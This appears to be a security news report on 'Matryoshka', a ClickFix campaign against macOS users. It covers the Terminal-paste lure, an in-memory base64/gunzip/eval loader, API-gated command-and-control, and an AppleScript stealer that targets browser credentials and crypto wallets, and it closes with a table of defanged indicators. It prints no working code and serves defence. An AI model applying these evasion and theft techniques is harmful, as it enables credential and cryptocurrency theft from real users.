A new variant of the “ClickFix” social engineering campaign specifically targeting macOS users. Codenamed Matryoshka a reference to its multiple nested obfuscation layers this evolution builds on prior ClickFix lures.
However, it adds advanced evasion features, including in‑memory decompression and API‑gated communication that make detection and analysis significantly harder.
Once triggered, the chain loads a stealthy AppleScript payload aimed at stealing browser credentials and compromising crypto wallet applications.
The attack begins when a user visits a deceptive domain such as comparisions[.]org a misspelling of the legitimate comparisons.org website.
This domain functions as part of a Traffic Distribution System (TDS) that quickly redirects victims to a spoofed support page or fake update portal.
Researchers first observed the campaign in early February 2026, spreading through typosquatting domains and redirect infrastructures designed to trick users into executing a so‑called “Terminal fix command.”
There, victims see a convincing “fix your installation” message instructing them to copy and paste a Terminal command.
This step serves as the social engineering bypass, since entering commands manually can override macOS protection layers that typically prevent unauthorized code execution. In doing so, the victim unwittingly runs a malicious shell script disguised as a legitimate patch.
Technical Analysis: Matryoshka Wrapper
Once executed, the command retrieves a small script commonly referenced as rogue.sh from a remote domain such as barbermoo[.]xyz.
This script contains a large Base64‑encoded and gzip‑compressed payload that unpacks entirely in memory using a pipeline sequence of Base64 decode → gunzip → eval.
This structure, resembling nested Russian dolls, keeps the inner payload invisible to traditional file‑based scanners.
If the command exchange is validated, the C2 server delivers a malicious AppleScript payload (rogue_applescript.scpt), detected by Intego as trojan:AppleScript/Stealer.gen.
After decompression, the inner loader takes over. It employs multiple anti‑analysis behaviors for stealth operation:
- Background detachment: The loader runs in the background, instantly returning control to the user to avoid suspicion.
- Output suppression: Input/output redirection hides script activity and errors.
- API‑gated communication: All network requests require a secret header for valid server responses, hindering traffic emulation by researchers.
- Argument‑based forwarding: If command‑line arguments are passed, they’re appended to outbound requests to transmit harvested data between stages.
Mitigations
By decoding and executing content on the fly, Matryoshka avoids writing key components to disk, thereby evading static inspection tools and many sandbox environments.
The script primarily seeks to extract stored passwords,cryptocurrency wallet credentials.
When direct theft fails, the malware triggers a phishing loop, mimicking a macOS “System Preferences” password dialog until the victim enters credentials.
It then targets Ledger Live and Trezor Suite applications: the former by swapping Electron archives inside the bundle for stealth persistence, and the latter by deleting and replacing the entire app with a tainted build.
After data collection, Matryoshka packages stolen information into /tmp/osalogging.zip and uploads it before displaying a deceptive system message to mislead the user into thinking the operation failed harmlessly.
Intego VirusBarrier currently detects the infection chain as:
- trojan:OSX/Stealer.sh (Zsh/Bash loader).
- trojan:AppleScript/Stealer.gen (AppleScript payload).
The campaign remains active, and users are strongly advised never to paste code into Terminal under any web instruction.
Genuine macOS fixes, updates, and drivers never require manual command‑line input. Any webpage asking users to do so should be immediately closed.
Indicators of Compromise (IOCs)
| Type Indicator | Context / Description |
|---|---|
| C2 Domain | barbermoo[.]xyz – Primary command-and-control (C2) infrastructure |
| Typosquatting Domain | comparisions[.]org – Used as initial redirect (typosquat) |
| Gateway URL | macfilesendstream[.]com/r2/ – Traffic distribution and routing point |
| Header | api-key: 5190ef17… – Required for C2 communication (value truncated) |
| File Path | /tmp/osalogging.zip – Staging file for stolen or exfiltrated data |
| SHA-256 (Observed Sample) | 62ca9538 889b767b 1c3b93e7 6a32fb44 69a2486c b3ccb5fb 5fa8beb2 dd0c2b90 |
| SHA-256 (Wrapper Script – rogue.sh) | d675bff1 b895b1a2 31c86ace 9d7a39d5 704e84c4 bc015525 b2a9c80c 39158338 |
| SHA-256 (Inner Loader Script) | 48770b64 93f2b9b9 e1d9bdbf 482ed981 e709bd03 e53885ff 992121af 16f76a09 |
| SHA-256 (AppleScript Payload – rogue_applescript.scpt) | (Add if available) |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
